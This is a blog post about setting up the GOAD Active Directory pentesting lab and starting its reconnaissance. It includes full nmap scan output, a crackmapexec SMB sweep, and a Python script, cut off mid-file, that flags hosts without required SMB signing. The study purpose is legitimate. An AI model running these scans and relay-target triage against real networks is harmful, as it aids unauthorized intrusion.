Pentesting | The GOAD Lab


Outside of competitions I rarely get to touch a complete penetration-testing scenario. GOAD is an open-source pentesting lab image that you can deploy on your own server. I recently built a small home server out of an old platform in my dorm, so I decided to set one up to play with.

Building the lab

The steps in the GOAD tutorial look simple, but all kinds of strange errors inevitably come up, so the build is actually quite a hassle.

After almost half a month of being tormented by it, my advice is: spin up a VM and configure it on the most pristine environment you can.

My environment:

  • Server: PVE 8.4.0
  • OS: Windows Server 2025 Standard 24H2
  • CPU: i5-12400, 6 cores assigned to the VM, CPU type set to host passthrough (otherwise VT-x is unavailable)
  • RAM: 24GB
  • Disk: 200GB
  • Python 3.11

Incidentally, for well-known reasons, my router runs a global proxy.

Then follow their steps to build the environment; the tutorial is at https://orange-cyberdefense.github.io/GOAD/installation/windows/.

I chose virtualbox as the provider and vm as the provisioner, with the default subnet 192.168.56.0/24.

If nothing goes wrong, after a few hours you should see it install successfully:

Since 24G is the minimum memory GOAD recommends, it is actually a bit of a struggle to run. I manually reduced each VM's memory by 1GB; actual memory usage ended up around 22.5GB. I would still recommend running it on a Linux host, which uses somewhat fewer resources.

Since it runs inside a VM, we need to reach into the internal network; I did this with a static route. First enable IP forwarding on the Windows server, see https://www.sjdhome.com/blog/post/ip-forward-on-windows/ .

For some reason the gateway is not set in the GOAD VMs' static IP configuration, so we need to log in to each VM and set the gateway manually (username vagrant, password vagrant) to 192.168.56.1.

Then run the following on your own machine as administrator:

route add 192.168.56.0 MASK 255.255.255.0 <your server IP>

Then ping 192.168.56.10 or open it in a browser; if you get a reply or the IIS test page appears, it worked.

The setup for the other VMs' IPs is the same.

Architecture

Preface to the pentest

Finally time to start hacking!

This post also serves as my notes on learning domain penetration, and is based on reproducing the original write-up (WP).

I feel the original WP does not explain cause and effect very well, i.e. why a given command is run and how you decide to run it in a given situation, so I will add some commentary where appropriate.

Information gathering

The first step is of course some information gathering, but what information do we collect, and with which tools? This section goes into detail.

Nmap

Honestly, the first thing to mindlessly run at the start is nmap, so here is the output:

$ nmap -Pn -p- -sC -sV -oA full_scan_goad 192.168.56.10-12,22-23
Nmap scan report for sevenkingdoms.local (192.168.56.10)
Host is up (0.00099s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-10 04:54:44Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2025-05-09T17:31:00
|_Not valid after:  2026-05-09T17:31:00
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:57+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2025-05-09T17:31:00
|_Not valid after:  2026-05-09T17:31:00
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2025-05-09T17:31:00
|_Not valid after:  2026-05-09T17:31:00
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2025-05-09T17:31:00
|_Not valid after:  2026-05-09T17:31:00
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Not valid before: 2025-05-08T16:26:22
|_Not valid after:  2025-11-07T16:26:22
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-05-08T08:04:20
|_Not valid after:  2028-05-07T08:04:20
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
49834/tcp open  msrpc         Microsoft Windows RPC
50931/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-05-10T04:57:30
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
Nmap scan report for winterfell.north.sevenkingdoms.local (192.168.56.11)
Host is up (0.00095s latency).
Not shown: 65508 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-10 04:54:51Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2025-05-09T19:04:37
|_Not valid after:  2026-05-09T19:04:37
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:57+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2025-05-09T19:04:37
|_Not valid after:  2026-05-09T19:04:37
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2025-05-09T19:04:37
|_Not valid after:  2026-05-09T19:04:37
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2025-05-09T19:04:37
|_Not valid after:  2026-05-09T19:04:37
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-05-10T04:57:57+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Not valid before: 2025-05-08T16:57:17
|_Not valid after:  2025-11-07T16:57:17
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-05-08T08:14:24
|_Not valid after:  2028-05-07T08:14:24
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49672/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
52840/tcp open  msrpc         Microsoft Windows RPC
64416/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-05-10T04:57:37
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
Nmap scan report for essos.local (192.168.56.12)
Host is up (0.0010s latency).
Not shown: 65508 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-10 04:55:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:meereen.essos.local
| Not valid before: 2025-05-09T17:31:12
|_Not valid after:  2026-05-09T17:31:12
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ESSOS)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:meereen.essos.local
| Not valid before: 2025-05-09T17:31:12
|_Not valid after:  2026-05-09T17:31:12
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:meereen.essos.local
| Not valid before: 2025-05-09T17:31:12
|_Not valid after:  2026-05-09T17:31:12
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:meereen.essos.local
| Not valid before: 2025-05-09T17:31:12
|_Not valid after:  2026-05-09T17:31:12
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=meereen.essos.local
| Not valid before: 2025-05-08T16:25:49
|_Not valid after:  2025-11-07T16:25:49
|_ssl-date: 2025-05-10T04:57:57+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-05-08T08:28:24
|_Not valid after:  2028-05-07T08:28:24
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|   h2
|_  http/1.1
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49718/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MEEREEN; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 46m41s, deviation: 2h20m05s, median: 0s
| smb2-time:
|   date: 2025-05-10T04:57:38
|_  start_date: 2025-05-09T19:02:34
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: meereen
|   NetBIOS computer name: MEEREEN\x00
|   Domain name: essos.local
|   Forest name: essos.local
|   FQDN: meereen.essos.local
|_  System time: 2025-05-09T21:57:39-07:00
Nmap scan report for castelblack.north.sevenkingdoms.local (192.168.56.22)
Host is up (0.00079s latency).
Not shown: 65516 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
|   192.168.56.22:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info:
|   192.168.56.22:1433:
|     Target_Name: NORTH
|     NetBIOS_Domain_Name: NORTH
|     NetBIOS_Computer_Name: CASTELBLACK
|     DNS_Domain_Name: north.sevenkingdoms.local
|     DNS_Computer_Name: castelblack.north.sevenkingdoms.local
|     DNS_Tree_Name: sevenkingdoms.local
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-09T18:59:40
|_Not valid after:  2055-05-09T18:59:40
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local
| Not valid before: 2025-05-08T17:12:38
|_Not valid after:  2025-11-07T17:12:38
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-05-10T04:57:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-05-08T08:39:34
|_Not valid after:  2028-05-07T08:39:34
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49752/tcp open  msrpc         Microsoft Windows RPC
49839/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-05-10T04:57:57+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-09T18:59:40
|_Not valid after:  2055-05-09T18:59:40
| ms-sql-info:
|   192.168.56.22:49839:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 49839
| ms-sql-ntlm-info:
|   192.168.56.22:49839:
|     Target_Name: NORTH
|     NetBIOS_Domain_Name: NORTH
|     NetBIOS_Computer_Name: CASTELBLACK
|     DNS_Domain_Name: north.sevenkingdoms.local
|     DNS_Computer_Name: castelblack.north.sevenkingdoms.local
|     DNS_Tree_Name: sevenkingdoms.local
|_    Product_Version: 10.0.17763
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-05-10T04:57:43
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
Nmap scan report for braavos.essos.local (192.168.56.23)
Host is up (0.00060s latency).
Not shown: 65516 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-05-10T05:10:05+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
|   192.168.56.23:1433:
|     Target_Name: ESSOS
|     NetBIOS_Domain_Name: ESSOS
|     NetBIOS_Computer_Name: BRAAVOS
|     DNS_Domain_Name: essos.local
|     DNS_Computer_Name: braavos.essos.local
|     DNS_Tree_Name: essos.local
|_    Product_Version: 10.0.14393
| ms-sql-info:
|   192.168.56.23:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-10T02:28:35
|_Not valid after:  2055-05-10T02:28:35
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: ESSOS
|   NetBIOS_Domain_Name: ESSOS
|   NetBIOS_Computer_Name: BRAAVOS
|   DNS_Domain_Name: essos.local
|   DNS_Computer_Name: braavos.essos.local
|   DNS_Tree_Name: essos.local
|   Product_Version: 10.0.14393
|_  System_Time: 2025-05-10T05:09:55+00:00
| ssl-cert: Subject: commonName=braavos.essos.local
| Not valid before: 2025-05-08T17:12:11
|_Not valid after:  2025-11-07T17:12:11
|_ssl-date: 2025-05-10T05:10:05+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|   h2
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-05-10T05:10:05+00:00; 0s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-05-08T08:56:38
|_Not valid after:  2028-05-07T08:56:38
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49721/tcp open  msrpc         Microsoft Windows RPC
49723/tcp open  msrpc         Microsoft Windows RPC
49788/tcp open  msrpc         Microsoft Windows RPC
49791/tcp open  msrpc         Microsoft Windows RPC
49859/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   192.168.56.23:49859:
|     Target_Name: ESSOS
|     NetBIOS_Domain_Name: ESSOS
|     NetBIOS_Computer_Name: BRAAVOS
|     DNS_Domain_Name: essos.local
|     DNS_Computer_Name: braavos.essos.local
|     DNS_Tree_Name: essos.local
|_    Product_Version: 10.0.14393
|_ssl-date: 2025-05-10T05:10:05+00:00; 0s from scanner time.
| ms-sql-info:
|   192.168.56.23:49859:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 49859
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-10T02:28:35
|_Not valid after:  2055-05-10T02:28:35
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 41m59s, deviation: 2h12m48s, median: 0s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: braavos
|   NetBIOS computer name: BRAAVOS\x00
|   Domain name: essos.local
|   Forest name: essos.local
|   FQDN: braavos.essos.local
|_  System time: 2025-05-09T22:09:55-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-05-10T05:09:59
|_  start_date: 2025-05-10T02:28:16

There are far too many results, so I won't analyze them for now.

crackmapexec

For how to use crackmapexec, see [my notes]() for more.

cme probes using the NetBIOS protocol and can quickly gather information on the machines in a subnet.

To get an overall picture of the machines in the subnet, we first do a quick scan of the subnet:

crackmapexec smb 192.168.56.1/24

We can see there are three domains in the subnet:

  • north.sevenkingdoms.local (2 ip)
    • .22 CASTELBLACK (windows server 2019) (signing false)
    • .11 WINTERFELL (windows server 2019)
  • sevenkingdoms.local (1 ip)
    • .10 KINGSLANDING (windows server 2019)
  • essos.local (2 ip)
    • .33 BRAAVOS (windows server 2016) (signing false)
    • .12 MEEREEN (windows server 2019)

Each domain has one DC, and SMB signing is required by default when a DC is installed, so the DCs are WINTERFELL, KINGSLANDING and MEEREEN.
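The nmap output above is too long to read by hand, and the DC/member/signing picture that cme gives us can be derived from it directly: a host offering Kerberos (88) and LDAP (389) is a DC, and the smb2-security-mode script tells us whether signing is required. The following is an added example, not code from the original WP or from the GOAD project; it parses a condensed, constructed subset of the nmap normal output shown above (the sample lines are copied from that output) and builds the per-domain summary. The role rule (88 + 389 open means DC) and the domain-from-hostname rule are my assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: a condensed subset of the nmap normal output shown above
SAMPLE_NMAP = """\
Nmap scan report for sevenkingdoms.local (192.168.56.10)
Host is up (0.00099s latency).
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-10 04:54:44Z)
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
Nmap scan report for castelblack.north.sevenkingdoms.local (192.168.56.22)
Host is up (0.00079s latency).
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
Nmap scan report for braavos.essos.local (192.168.56.23)
Host is up (0.00060s latency).
PORT      STATE SERVICE       VERSION
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

REPORT_RE = re.compile(r"^Nmap scan report for (\S+) \((\d+\.\d+\.\d+\.\d+)\)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
SIGNING_RE = re.compile(r"^\|_\s+Message signing (.+)$")      # smb2-security-mode result line
NETBIOS_RE = re.compile(r"^Service Info: Host: ([^;]+);")


@dataclass
class Host:
    hostname: str
    ip: str
    ports: Dict[int, str] = field(default_factory=dict)  # port -> nmap service name
    smb2_signing: Optional[str] = None
    netbios: Optional[str] = None


def parse_nmap(text: str) -> List[Host]:
    """Walk the normal-format report line by line; each 'Nmap scan report' starts a new host."""
    hosts: List[Host] = []
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            hosts.append(Host(hostname=m.group(1), ip=m.group(2)))
            continue
        if not hosts:
            continue
        cur = hosts[-1]
        if (m := PORT_RE.match(line)):
            cur.ports[int(m.group(1))] = m.group(2)
        elif (m := SIGNING_RE.match(line)):
            cur.smb2_signing = m.group(1).strip()
        elif (m := NETBIOS_RE.match(line)):
            cur.netbios = m.group(1)
    return hosts


def role(host: Host) -> str:
    # Assumption: Kerberos + LDAP open together marks a domain controller
    return "DC" if {88, 389}.issubset(host.ports) else "member"


def domain_of(host: Host) -> str:
    # Assumption: reverse-DNS name is host.domain, except a bare domain name for the DC itself
    labels = host.hostname.split(".")
    return ".".join(labels[1:]) if len(labels) > 2 else host.hostname


def signing_not_required(hosts: List[Host]) -> List[str]:
    """Hosts where SMB2 signing is negotiable: the ones cme reports as 'signing false'."""
    return [h.ip for h in hosts if h.smb2_signing and "not required" in h.smb2_signing]


def summarize(hosts: List[Host]) -> Dict[str, Dict[str, List[str]]]:
    out: Dict[str, Dict[str, List[str]]] = {}
    for h in hosts:
        entry = out.setdefault(domain_of(h), {"dc": [], "members": []})
        entry["dc" if role(h) == "DC" else "members"].append(h.ip)
    return out


if __name__ == "__main__":
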